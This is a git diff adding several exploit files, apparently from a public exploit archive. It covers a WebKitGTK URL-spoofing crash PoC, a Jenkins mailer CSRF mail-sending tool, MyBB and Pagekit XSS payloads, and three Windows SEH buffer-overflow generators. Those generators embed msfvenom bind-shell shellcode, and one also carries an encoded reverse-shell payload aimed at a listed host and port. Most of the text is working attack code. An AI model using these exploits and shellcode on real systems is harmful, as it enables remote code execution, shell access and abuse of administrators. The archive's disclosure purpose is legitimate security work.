+# mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue.
+
+# PoC:
+
+<script>
+win = window.open("sleep_one_second.php", "WIN"); 
+window.open("https://www.paypal.com", "WIN");  
+win.document.execCommand('Stop');              
+win.document.write("Spoofed URL");   
+win.document.close();
+</script>
+
+
+Backtrace using fedora 27:
+
+#0 WTF::StringImpl::rawHash
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
+#1 WTF::StringImpl::hasHash
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
+#2 WTF::StringImpl::hash
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
+#3 WTF::StringHash::hash
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
+#9 WTF::HashMap, WTF::HashTraits >::get
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406
+#10 webkitFaviconDatabaseSetIconURLForPageURL
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193
+#11 webkitFaviconDatabaseSetIconForPageURL
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318
+#12 webkitWebViewSetIcon
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964
+#13 WTF::Function::performCallbackWithReturnValue
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108
+#15 WebKit::WebPageProxy::dataCallback
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083
+#16 WebKit::WebPageProxy::finishedLoadingIcon
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848
+#17 IPC::callMemberFunctionImpl::operator()
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68
+#29 WTF::RunLoop::::_FUN(gpointer)
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70
+#30 g_main_dispatch
+at gmain.c line 3148
+#31 g_main_context_dispatch
+at gmain.c line 3813
+#32 g_main_context_iterate
+at gmain.c line 3886
+#33 g_main_context_iteration
+at gmain.c line 3947x
+#34 g_application_run
+at gapplication.c line 2401
+#35 main
+at ../src/ephy-main.c line 432 
+
+
+# Reference's:
+# https://bugs.webkit.org/show_bug.cgi?id=186164
+# https://bugzilla.gnome.org/show_bug.cgi?id=795740
\ No newline at end of file
diff --git a/exploits/linux/webapps/44843.py b/exploits/linux/webapps/44843.py
new file mode 100755
index 000000000..ff4cf496b
--- /dev/null
+++ b/exploits/linux/webapps/44843.py
@@ -0,0 +1,219 @@
+# Exploit Title : Jenkins mailer plugin < 1.20 - Cross-Site Request Forgery
+# Date : 2018-06-05
+# Exploit Author : Kl3_GMjq6
+# Vendor Homepage : https://jenkins.io/
+# Software Link : [https://updates.jenkins.io/download/plugins/mailer/1.20/mailer.hpi]
+# Version: [Below Version 1.20 (1.1 ~ 1.20) ]
+# Ref: https://jenkins.io/security/advisory/2018-03-26/#SECURITY-774
+# Tested on : Linux , Windows
+# CVE : CVE-2018-8718
+
+import email.message
+import smtplib
+import getpass
+
+payload_list = ['url','subject','cover_message','sender','reciver','test_email','smtp_server','l_id','l_pw']
+table = {}
+for i in payload_list :
+    table.update({i:''})
+    
+def send_mail() :
+    msg = email.message.Message()
+    msg['Subject'] = table['subject']
+    msg['From'] = table['sender']
+    msg['To'] = table['reciver']
+    msg.add_header('Content-Type','text/html')
+    msg.set_payload('<a href="'+table['url']+'\
+/descriptorByName/hudson.tasks.Mailer/sendTestMail?\
+charset=UTF-8&sendTestMailTo='+table['test_email']+'&adminAddress='+table['reciver']+'\
+&smtpPort=465&smtpServer='+table['smtp_server']+'&smtpAuthPasswordSecret='+table['l_pw']+'\
+&useSMTPAuth=true&useSsl=true&smtpAuthUserName='+table['l_id']+'">\
+'+table['cover_message']+'</a>')
+    s = smtplib.SMTP(table['smtp_server'])
+    s.starttls()
+    s.login(table['l_id'],
+            table['l_pw'])
+    s.sendmail(msg['From'], [msg['To']], msg.as_string())
+
+def url_set() :
+    url = str(input("Jenkins Server's URL(ex : http://vuln.jenkins.com) : "))
+    if len(url) <= 0 :
+        print ("    Can't Be Null!")
+        url_set()
+    elif url[0:4] != "http" :
+        print ("    URL must start with 'http://' ")
+        url_set()
+    else : table['url'] = url
+
+def subject_set() :
+    subject = str(input ("SUBJECT [Default : Look! Warning with your Jenkins] : "))
+    if len(subject) <= 0 :
+        subject = "Look! Waning with your Jenkins"
+    table['subject'] = subject
+
+def cover_message() :
+    cover_message = str(input ("Cover Message [Default : Here is your Vulnable!] : "))
+    if len(cover_message) <= 0 :
+        cover_message = "Here is your Vulnable!"
+    table['cover_message'] = cover_message
+    
+def sender() :
+    sender = str(input ("Attacker E-mail(ex : attacker@abcd.com) : "))
+    if len(sender) <= 0 :
+        print ("    Can't Be Null!")
+        sender()
+    else : table['sender'] = sender
+
+def reciver() :
+    reciver = str(input ("Admin's E-mail(ex : admin@abcd.com) : "))
+    if len(reciver) <= 0 :
+        print ("    Can't Be Null!")
+        reciver()
+    else : table['reciver'] = reciver
+
+def test_email() :
+    test_email = str(input ("Tester E-mail(ex : tester@abcd.com) : "))
+    if len(test_email) <= 0 :
+        print ("    Can't Be Null!")
+        test_email()
+    table['test_email']  = test_email
+
+def smtp_server() :
+    smtp_server = str(input ("SMTP_Server [Default : smtp.gmail.com] : "))
+    if len(smtp_server) <= 0 :
+        smtp_server = "smtp.gmail.com"
+    table['smtp_server'] = smtp_server
+
+def l_id() :
+    l_id = str(input ("Your SMTP_Server ID  : "))
+    if len(l_id) <= 0 :
+        print ("    Can't Be Null!")
+        l_id()
+    table['l_id'] = l_id
+
+def l_pw() :
+    l_pw = str(getpass.getpass("Your SMTP_Server PW : "))
+    if len(l_pw) <= 0 :
+        print ("    Can't Be Null!")
+        l_pw()
+    table['l_pw'] = l_pw
+
+def set_all () :
+    url_set()
+    subject_set()
+    cover_message()
+    sender()
+    reciver()
+    test_email()
+    smtp_server()
+    l_id()
+    l_pw()
+    print ("Setting Complit! Use 'show' to check options")
+
+set_help = {
+    'all':"Set all payload",
+    'help':"Show set commend's help",
+    'url_set':"Set only 'url_set' payload",
+    'subject_set':"Set only 'url_set' payload",
+    'cover_message':"Set only 'cover_message' payload",
+    'sender':"Set only 'sender' payload",
+    'reciver':"Set only 'reciver' payload",
+    'test_email':"Set only 'test_email' payload",
+    'smtp_server':"Set only 'smtp_server' payload",
+    'l_id':"Set only 'l_id' payload",
+    'l_pw':"Set only 'l_pw' payload",
+    }
+
+def set_select (a) :
+    if a=="all" : set_all() 
+    elif a=="url_set" : url_set()
+    elif a=="subject_set" : subject_set()
+    elif a=="cover_message" : cover_message()
+    elif a=="sender" : sender()
+    elif a=="reciver" : reciver()
+    elif a=="test_email" : test_email()
+    elif a=="smtp_server" : smtp_server()
+    elif a=="l_id" : l_id()
+    elif a=="l_pw" : l_pw()
+    elif a=="help" :
+        for i in set_help :
+            print ("    -%-20s %-s" %(i,set_help[i]))
+    print ('')
+
+
+
+while True :
+    direct = str(input ("CVE-2018-8718 >> ")).lower()
+    
+    if direct == "help" :
+        print ("""\
+    %-10s Show this help menu.          
+    %-10s [-all / -help / -url_set / -subject_set / .... ]
+    %-10s Set the Payload
+    %-10s [-all] Show Current Setting.
+    %-10s Send CSRF use current setting.
+    """ %("help","set","","show","send"))
+        
+    elif direct[0:3] == "set" :
+        if ' -' not in direct :
+            if direct == "set" :
+                set_option = ["help"]
+            else :
+                print ("    Option error \n")
+        else :
+            set_option = direct.split(' -')[1:]
+        okay = 1
+
+        if len(set_option) == 1 :
+            if set_option[0] not in set_help :
+                print ("    Option error \n")
+            else :
+                set_select(set_option[0])
+        elif len(set_option) >= 2 :
+            for i in set_option :
+                if i in ['help', 'all'] :
+                    print ("     *Option [-help / -all] cannot be use with another options \n")
+                    okay = 0
+                    break
+            for i in set_option :
+                if i not in set_help :
+                    print ("    Option error \n")
+                    okay = 0
+                    break
+            if okay == 1 :
+                for i in set_option :
+                    set_select(i)
+                    
+    elif direct[:4] == "show" :
+        if " -" not in direct :
+
+            if direct == "show" :
+                for i in table :
+                    if i != "l_pw" :
+                        print ("    %-20s %s" %(i,table[i]))
+                print ("    If you want to see l_pw... add [-all] option")
+                print ("")
+            else :
+                print ("    Option error \n")
+        else :
+            show_option = direct.split(" -")[1:]
+            if (len(show_option) == 1 and show_option[0] == 'all') :
+                for i in table :
+                    print ("      %-20s %s" %(i,table[i]))
+                print ()
+            else :
+                print ("    Option error \n")
+        
+    elif direct == "send" :
+        print ("    Sending CSRF Mail.....")
+        try :
+            send_mail()
+            print ("    Succed!!\n")
+        except :
+            print ("    Fail....")
+            
+    elif direct == "exit" :
+        break
+    
+    else :
+        print ("    Usage : help\n")
\ No newline at end of file
diff --git a/exploits/php/webapps/44833.txt b/exploits/php/webapps/44833.txt
new file mode 100644
index 000000000..536149cc1
--- /dev/null
+++ b/exploits/php/webapps/44833.txt
@@ -0,0 +1,25 @@
+# Exploit Title: MyBB Recent Threads Plugin v1.0 - Cross-Site Scripting
+# Date: 6/2/2018
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=842
+# Version: 1.0
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2018-11715
+
+
+1. Description:
+Creates a page that shows threads that the user has posted in when they have unread replies.
+
+ 
+
+2. Proof of Concept:
+
+- Create or reply to a thread with the following subject  <script>alert('XSS')</script> 
+- When someone replies to the thread you will see the alert here /misc.php?action=myrecentthreads
+
+
+
+3. Solution:
+Update to 1.1
\ No newline at end of file
diff --git a/exploits/php/webapps/44837.py b/exploits/php/webapps/44837.py
new file mode 100755
index 000000000..7590412ee
--- /dev/null
+++ b/exploits/php/webapps/44837.py
@@ -0,0 +1,33 @@
+# Title: Pagekit < 1.0.13 - Cross-Site Scripting Code Generator
+# Author : DEEPIN2
+# Date: 2018-06-05
+# Vendor: Pagekit
+# Sotware: https://pagekit.com/
+# Version: < 1.0.13
+# CVE: 2018-11564
+# python3 required
+
+def makesvg(name, code):
+	code = '<exploit:script xmlns:exploit="http://www.w3.org/1999/xhtml">' + code + '</exploit:script>'
+	f = open(name, 'w+')
+	f.write(code)
+	f.close
+
+
+if __name__ == '__main__':
+	print('''
+  ______     _______     ____   ___  _  ___        _ _ ____   __   _  _   
+ / ___\ \   / / ____|   |___ \ / _ \/ |( _ )      / / | ___| / /_ | || |  
+| |    \ \ / /|  _| _____ __) | | | | |/ _ \ _____| | |___ \| '_ \| || |_ 
+| |___  \ V / | |__|_____/ __/| |_| | | (_) |_____| | |___) | (_) |__   _|
+ \____|  \_/  |_____|   |_____|\___/|_|\___/      |_|_|____/ \___/   |_|  
+	[*] Author : DEEPIN2(Junseo Lee)''')
+	print('[*] enter name without extension, ex) test.svg -> test')
+	filename = input('Filename : ') + '.svg'
+	print('[*] If you want to use alert(), type "alert("bla..bla..")"')
+	scriptcode = input('Script code : ')
+	try:
+		makesvg(filename, scriptcode)
+		print('[+] Successfully make venom file "%s"' %filename)
+	except Error as e:
+		print(e)
\ No newline at end of file
diff --git a/exploits/windows/local/44834.py b/exploits/windows/local/44834.py
new file mode 100755
index 000000000..ce240ae0f
--- /dev/null
+++ b/exploits/windows/local/44834.py
@@ -0,0 +1,34 @@
+#!/usr/bin/python
+#----------------------------------------------------------------------------------------------------------------------#
+# Exploit Title      : Clone 2 GO Video converter 2.8.2 Unicode Buffer Overflow (Remote Code Execution)        		   #
+# Exploit Author     : Gokul Babu				                                  			   						   #
+# Organisation		 : Arridae Infosec P.V Ltd																		   #
+# Vendor Homepage    : http://www.clone2go.com/products/videoconverter.php                                             #
+# Vulnerable Software: http://www.clone2go.com/down/video-converter-setup.exe			                               #
+# Tested on          : Windows-7 64-bit(eip-828)(Other windows versions also vulnerable Only Eip overwrite will change #
+# Steps to reproduce :  Open the evil.txt paste the contents in Options -> Set output folder -> Browse 				   #
+#----------------------------------------------------------------------------------------------------------------------#
+
+#payload generation method
+#msfpayload windows/exec CMD=calc.exe R > calc.raw
+#./alpha2 eax --unicode --uppercase < calc.raw
+
+#seh-"004d00b3"
+#\x73-venetian pad(other things didn't work)
+#248 bytes of padding before shellcode is required which is 124 bytes in Unicode
+#EAX register is used for operation
+
+seh= "\x41\x73" + "\xb3\x4d"
+operation="\x73\x53\x73\x58\x73\x05\x0b\x01\x73\x2d\x02\x01\x73\x50\x73\xc3" + "\x90"*124
+
+shellcode=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK83YKPKPKPS0TIYUNQ8RC4TKPRP0TK0RLL4KPRLT4KRRNHLOWGPJMVNQKO01GP6LOLQQCLM2NLMPWQXOLMKQ97IRL0PR0W4K22LP4KOROLKQ8P4KOP2XU5WP2TPJKQXPPPDKPHMHTK28MPKQXSK3OLOYTKP4TKKQXVNQKONQWP6LY1XOLMKQWW08K0RUL4M3SMZXOK3MNDBUIRQH4KB8MTKQXSBFDKLLPKTK0XMLM1IC4KKTDKM1HPSY14MTNDQKQKQQ0YPZR1KOIPQHQO1J4KLRJKE6QMRJKQTMU5VYKPM0M0PPS801TKROTGKOJ57KJP7EUR1FQXW6TUGM5MKOXUOLLFSLLJSPKK9P2UM57KOWN3T2BOBJKP1CKO8UQSC1RL2CKPA")
+
+#msfpayload windows/shell_reverse_tcp LHOST=172.20.10.3 LPORT=4444 R > reverse.raw
+#./alpha2 eax --unicode --uppercase < reverse.raw 
+reverse=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKL9X3YM0KPKPQPTIYUNQYBQTDKR2NPTKPRLL4KQBMDTKBRMXLOVWOZMVP1KONQWP6LOLQQSLKRNLMPWQXOLMM1Y7YRL022B7TKPRLPDKOROLKQHPDKOP2XCUY044OZKQJ00PTKOXN84KPXMPKQ9CK3OLQ9TKNT4KKQZ6P1KONQ7P6LWQHOLMKQ97OHIPBUJTM3SMKHOK3MNDRUK2R84KQHNDKQZ3S64KLL0KTKR8MLKQICTKM44KKQHPDIOTO4O4QKQK1Q0YPZPQKOK0QH1O1JTKLRZKDF1MS8NSNRKPKP1XT7BSNR1O0TQXPLCGMVKWKO8UFX4PKQKPKPMY940TPPBHO9502KKPKO9EPP0P20PPOPR0OP0P1XJJLO9O9PKO8UTIXGRH6LN4LJLCQXLBM0LQQLDI9VQZLPPVPW1XTYEUT4QQKOJ5BHQSBMQTM0U9JCR7270WP1JV1ZMBPYR6YRKM1VY7PDNDOLKQM1TMOTO4LPGVKPQ4PTPPB6PVPVOVB60NPVPV0SPVRH2Y8LOO3VKO9ESYK00NR6OVKO00S8LHDGMMQPKOXUGKJPVUVBPVRH76TUWMUMKOJ5OLKVSLLJ3PKKYPT5KUWKOWMCRRRO1ZKPPSKOZ5A")
+
+buf="A"*828 + seh + operation + shellcode + "D"*(4164-len(operation) -len(shellcode))
+
+f=open("evil.txt","w")
+f.write(buf)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows_x86/local/44838.py b/exploits/windows_x86/local/44838.py
new file mode 100755
index 000000000..8e5005e30
--- /dev/null
+++ b/exploits/windows_x86/local/44838.py
@@ -0,0 +1,75 @@
+# Exploit Title      : 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)  
+# Exploit Author     : Hashim Jawad - ihack4falafel                                                      
+# Vendor Homepage    : https://www.10-strike.com/                                                         
+# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe     
+# Tested on          : Windows 7 Enterprise - SP1 (x86)                                                   
+# Disclosure Timeline:
+# 06-02-18: Contacted vendor, no response 
+# 06-03-18: Contacted vendor, no response
+# 06-04-18: Contacted vendor, no response
+# 06-05-18: Proof of concept exploit published 
+
+# Steps to reproduce:
+# - Under Computers tab click on 'From Text File'
+# - Open Evil.txt and boom!
+# Notes:
+# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
+# - Next SEH offset is 211 bytes but for some reason passing the exception to the program will result in shifting 
+#   the stack by 8 bytes, see buffer for reference.
+# - Keep in mind the exploit is contingent on path, and as such you need to make sure offsets stay intact based on 
+#   your username, the following is the path used while developing the exploit (default on Windows 7): 
+#   [C:\Users\IEUser\AppData\Roaming\10-strike\Network Inventory\cfg\]
+# - Pro edition is effected as well.   
+
+#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x3a\x5c' -f python -v shellcode
+#Payload size: 355 bytes
+
+#!/usr/bin/python
+
+shellcode =  ""
+shellcode += "\xba\x58\x39\xb1\xae\xd9\xcf\xd9\x74\x24\xf4\x5f"
+shellcode += "\x29\xc9\xb1\x53\x83\xef\xfc\x31\x57\x0e\x03\x0f"
+shellcode += "\x37\x53\x5b\x53\xaf\x11\xa4\xab\x30\x76\x2c\x4e"
+shellcode += "\x01\xb6\x4a\x1b\x32\x06\x18\x49\xbf\xed\x4c\x79"
+shellcode += "\x34\x83\x58\x8e\xfd\x2e\xbf\xa1\xfe\x03\x83\xa0"
+shellcode += "\x7c\x5e\xd0\x02\xbc\x91\x25\x43\xf9\xcc\xc4\x11"
+shellcode += "\x52\x9a\x7b\x85\xd7\xd6\x47\x2e\xab\xf7\xcf\xd3"
+shellcode += "\x7c\xf9\xfe\x42\xf6\xa0\x20\x65\xdb\xd8\x68\x7d"
+shellcode += "\x38\xe4\x23\xf6\x8a\x92\xb5\xde\xc2\x5b\x19\x1f"
+shellcode += "\xeb\xa9\x63\x58\xcc\x51\x16\x90\x2e\xef\x21\x67"
+shellcode += "\x4c\x2b\xa7\x73\xf6\xb8\x1f\x5f\x06\x6c\xf9\x14"
+shellcode += "\x04\xd9\x8d\x72\x09\xdc\x42\x09\x35\x55\x65\xdd"
+shellcode += "\xbf\x2d\x42\xf9\xe4\xf6\xeb\x58\x41\x58\x13\xba"
+shellcode += "\x2a\x05\xb1\xb1\xc7\x52\xc8\x98\x8f\x97\xe1\x22"
+shellcode += "\x50\xb0\x72\x51\x62\x1f\x29\xfd\xce\xe8\xf7\xfa"
+shellcode += "\x31\xc3\x40\x94\xcf\xec\xb0\xbd\x0b\xb8\xe0\xd5"
+shellcode += "\xba\xc1\x6a\x25\x42\x14\x06\x2d\xe5\xc7\x35\xd0"
+shellcode += "\x55\xb8\xf9\x7a\x3e\xd2\xf5\xa5\x5e\xdd\xdf\xce"
+shellcode += "\xf7\x20\xe0\xe1\x5b\xac\x06\x6b\x74\xf8\x91\x03"
+shellcode += "\xb6\xdf\x29\xb4\xc9\x35\x02\x52\x81\x5f\x95\x5d"
+shellcode += "\x12\x4a\xb1\xc9\x99\x99\x05\xe8\x9d\xb7\x2d\x7d"
+shellcode += "\x09\x4d\xbc\xcc\xab\x52\x95\xa6\x48\xc0\x72\x36"
+shellcode += "\x06\xf9\x2c\x61\x4f\xcf\x24\xe7\x7d\x76\x9f\x15"
+shellcode += "\x7c\xee\xd8\x9d\x5b\xd3\xe7\x1c\x29\x6f\xcc\x0e"
+shellcode += "\xf7\x70\x48\x7a\xa7\x26\x06\xd4\x01\x91\xe8\x8e"
+shellcode += "\xdb\x4e\xa3\x46\x9d\xbc\x74\x10\xa2\xe8\x02\xfc"
+shellcode += "\x13\x45\x53\x03\x9b\x01\x53\x7c\xc1\xb1\x9c\x57"
+shellcode += "\x41\xc1\xd6\xf5\xe0\x4a\xbf\x6c\xb1\x16\x40\x5b"
+shellcode += "\xf6\x2e\xc3\x69\x87\xd4\xdb\x18\x82\x91\x5b\xf1"
+shellcode += "\xfe\x8a\x09\xf5\xad\xab\x1b"
+
+buffer  = '\x41' * 207                           filler to nSEH offset (211-4)
+buffer += '\x9f\x4e\xe9\x61'                     0x61E94E9F [sqlite3.dll] | jmp esp
+buffer += '\x90\x90\x90\x90'                     nSEH
+buffer += '\x90\x90\x90\x90'                     SEH 
+buffer += shellcode                              bind shell 
+buffer += '\xcc' * (3000-207-12-len(shellcode))  junk 
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except Exception as e:
+	print e
\ No newline at end of file
diff --git a/exploits/windows_x86/local/44840.py b/exploits/windows_x86/local/44840.py
new file mode 100755
index 000000000..cbea523c3
--- /dev/null
+++ b/exploits/windows_x86/local/44840.py
@@ -0,0 +1,71 @@
+# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)
+# Exploit Author: Hashim Jawad - ihack4falafelx
+# Date: 2018-06-05
+# Vendor Homepage: https://www.10-strike.com/
+# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Tested on: Windows 7 Enterprise - SP1 (x86)
+# Disclosure Timeline:
+# 06-02-18: Contacted vendor, no response 
+# 06-03-18: Contacted vendor, no response
+# 06-04-18: Contacted vendor, no response
+# 06-05-18: Proof of concept exploit published 
+
+# Steps to reproduce:
+# - Under Help, click 'Enter Registration Key'.  
+# - Paste the contents of Evil.txt and click OK.
+# Notes:
+# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
+# - There is ample space prior to SEH overwrite.
+# - Pro edition is effected as well.
+# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -f python -v shellcode
+# - Payload size: 355 bytes
+
+#!/usr/bin/python
+
+shellcode =  ""
+shellcode += "\xbf\xad\xa8\x1e\x44\xdd\xc0\xd9\x74\x24\xf4\x5e"
+shellcode += "\x2b\xc9\xb1\x53\x83\xc6\x04\x31\x7e\x0e\x03\xd3"
+shellcode += "\xa6\xfc\xb1\xd7\x5f\x82\x3a\x27\xa0\xe3\xb3\xc2"
+shellcode += "\x91\x23\xa7\x87\x82\x93\xa3\xc5\x2e\x5f\xe1\xfd"
+shellcode += "\xa5\x2d\x2e\xf2\x0e\x9b\x08\x3d\x8e\xb0\x69\x5c"
+shellcode += "\x0c\xcb\xbd\xbe\x2d\x04\xb0\xbf\x6a\x79\x39\xed"
+shellcode += "\x23\xf5\xec\x01\x47\x43\x2d\xaa\x1b\x45\x35\x4f"
+shellcode += "\xeb\x64\x14\xde\x67\x3f\xb6\xe1\xa4\x4b\xff\xf9"
+shellcode += "\xa9\x76\x49\x72\x19\x0c\x48\x52\x53\xed\xe7\x9b"
+shellcode += "\x5b\x1c\xf9\xdc\x5c\xff\x8c\x14\x9f\x82\x96\xe3"
+shellcode += "\xdd\x58\x12\xf7\x46\x2a\x84\xd3\x77\xff\x53\x90"
+shellcode += "\x74\xb4\x10\xfe\x98\x4b\xf4\x75\xa4\xc0\xfb\x59"
+shellcode += "\x2c\x92\xdf\x7d\x74\x40\x41\x24\xd0\x27\x7e\x36"
+shellcode += "\xbb\x98\xda\x3d\x56\xcc\x56\x1c\x3f\x21\x5b\x9e"
+shellcode += "\xbf\x2d\xec\xed\x8d\xf2\x46\x79\xbe\x7b\x41\x7e"
+shellcode += "\xc1\x51\x35\x10\x3c\x5a\x46\x39\xfb\x0e\x16\x51"
+shellcode += "\x2a\x2f\xfd\xa1\xd3\xfa\x68\xa9\x72\x55\x8f\x54"
+shellcode += "\xc4\x05\x0f\xf6\xad\x4f\x80\x29\xcd\x6f\x4a\x42"
+shellcode += "\x66\x92\x75\x7d\x2b\x1b\x93\x17\xc3\x4d\x0b\x8f"
+shellcode += "\x21\xaa\x84\x28\x59\x98\xbc\xde\x12\xca\x7b\xe1"
+shellcode += "\xa2\xd8\x2b\x75\x29\x0f\xe8\x64\x2e\x1a\x58\xf1"
+shellcode += "\xb9\xd0\x09\xb0\x58\xe4\x03\x22\xf8\x77\xc8\xb2"
+shellcode += "\x77\x64\x47\xe5\xd0\x5a\x9e\x63\xcd\xc5\x08\x91"
+shellcode += "\x0c\x93\x73\x11\xcb\x60\x7d\x98\x9e\xdd\x59\x8a"
+shellcode += "\x66\xdd\xe5\xfe\x36\x88\xb3\xa8\xf0\x62\x72\x02"
+shellcode += "\xab\xd9\xdc\xc2\x2a\x12\xdf\x94\x32\x7f\xa9\x78"
+shellcode += "\x82\xd6\xec\x87\x2b\xbf\xf8\xf0\x51\x5f\x06\x2b"
+shellcode += "\xd2\x6f\x4d\x71\x73\xf8\x08\xe0\xc1\x65\xab\xdf"
+shellcode += "\x06\x90\x28\xd5\xf6\x67\x30\x9c\xf3\x2c\xf6\x4d"
+shellcode += "\x8e\x3d\x93\x71\x3d\x3d\xb6"
+
+buffer  = '\x41' * 4188                                # filler to nSEH
+buffer += '\x75\x06\x74\x06'                           # nSEH | jump net
+buffer += '\x7a\x49\xe8\x61'                           # SEH  | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]
+buffer += '\x90' * 8                                   # nops
+buffer += shellcode                                    # bind shell
+buffer += '\x41' * (5000-4188-16-len(shellcode))       # junk
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except Exception as e:
+	print e
\ No newline at end of file
diff --git a/exploits/windows_x86/local/44841.py b/exploits/windows_x86/local/44841.py
new file mode 100755
index 000000000..0b7a538f1
--- /dev/null
+++ b/exploits/windows_x86/local/44841.py
@@ -0,0 +1,85 @@
+# Exploit Title: 10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)
+# Exploit Author: Hashim Jawad - ihack4falafel
+# Date: 2018-06-05
+# Vendor Homepage: https://www.10-strike.com/
+# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe
+# Tested on: Windows XP Professional - SP3 (x86)
+# Disclosure Timeline:
+# 06-02-18: Contacted vendor, no response 
+# 06-03-18: Contacted vendor, no response
+# 06-04-18: Contacted vendor, no response
+# 06-05-18: Proof of concept exploit published 
+
+# Steps to reproduce:
+# - Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.
+# - Right-click on newly created host and click 'Trace route...'.
+# - Repeat the second step and boom.
+# Notes:
+# - '\x00' get converted to '\x20' by the program eliminating the possibility of using [pop, pop, retn] pointers in base binary.
+# - All loaded modules are compiled with /SafeSEH.
+# - Right-click on newly created host and click 'System information>General' is effected by the same vulnerability with different
+#   offsets and buffer size.
+# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -v shellcode -f python
+# - Payload size: 355 bytes
+
+#!/usr/bin/python
+
+shellcode =  ""
+shellcode += "\xb8\x2b\x29\xa7\x48\xd9\xe8\xd9\x74\x24\xf4\x5b"
+shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\xc0"
+shellcode += "\xd5\x45\xbd\xea\xce\x08\x3e\x12\x0f\x6d\xb6\xf7"
+shellcode += "\x3e\xad\xac\x7c\x10\x1d\xa6\xd0\x9d\xd6\xea\xc0"
+shellcode += "\x16\x9a\x22\xe7\x9f\x11\x15\xc6\x20\x09\x65\x49"
+shellcode += "\xa3\x50\xba\xa9\x9a\x9a\xcf\xa8\xdb\xc7\x22\xf8"
+shellcode += "\xb4\x8c\x91\xec\xb1\xd9\x29\x87\x8a\xcc\x29\x74"
+shellcode += "\x5a\xee\x18\x2b\xd0\xa9\xba\xca\x35\xc2\xf2\xd4"
+shellcode += "\x5a\xef\x4d\x6f\xa8\x9b\x4f\xb9\xe0\x64\xe3\x84"
+shellcode += "\xcc\x96\xfd\xc1\xeb\x48\x88\x3b\x08\xf4\x8b\xf8"
+shellcode += "\x72\x22\x19\x1a\xd4\xa1\xb9\xc6\xe4\x66\x5f\x8d"
+shellcode += "\xeb\xc3\x2b\xc9\xef\xd2\xf8\x62\x0b\x5e\xff\xa4"
+shellcode += "\x9d\x24\x24\x60\xc5\xff\x45\x31\xa3\xae\x7a\x21"
+shellcode += "\x0c\x0e\xdf\x2a\xa1\x5b\x52\x71\xae\xa8\x5f\x89"
+shellcode += "\x2e\xa7\xe8\xfa\x1c\x68\x43\x94\x2c\xe1\x4d\x63"
+shellcode += "\x52\xd8\x2a\xfb\xad\xe3\x4a\xd2\x69\xb7\x1a\x4c"
+shellcode += "\x5b\xb8\xf0\x8c\x64\x6d\x6c\x84\xc3\xde\x93\x69"
+shellcode += "\xb3\x8e\x13\xc1\x5c\xc5\x9b\x3e\x7c\xe6\x71\x57"
+shellcode += "\x15\x1b\x7a\x46\xba\x92\x9c\x02\x52\xf3\x37\xba"
+shellcode += "\x90\x20\x80\x5d\xea\x02\xb8\xc9\xa3\x44\x7f\xf6"
+shellcode += "\x33\x43\xd7\x60\xb8\x80\xe3\x91\xbf\x8c\x43\xc6"
+shellcode += "\x28\x5a\x02\xa5\xc9\x5b\x0f\x5d\x69\xc9\xd4\x9d"
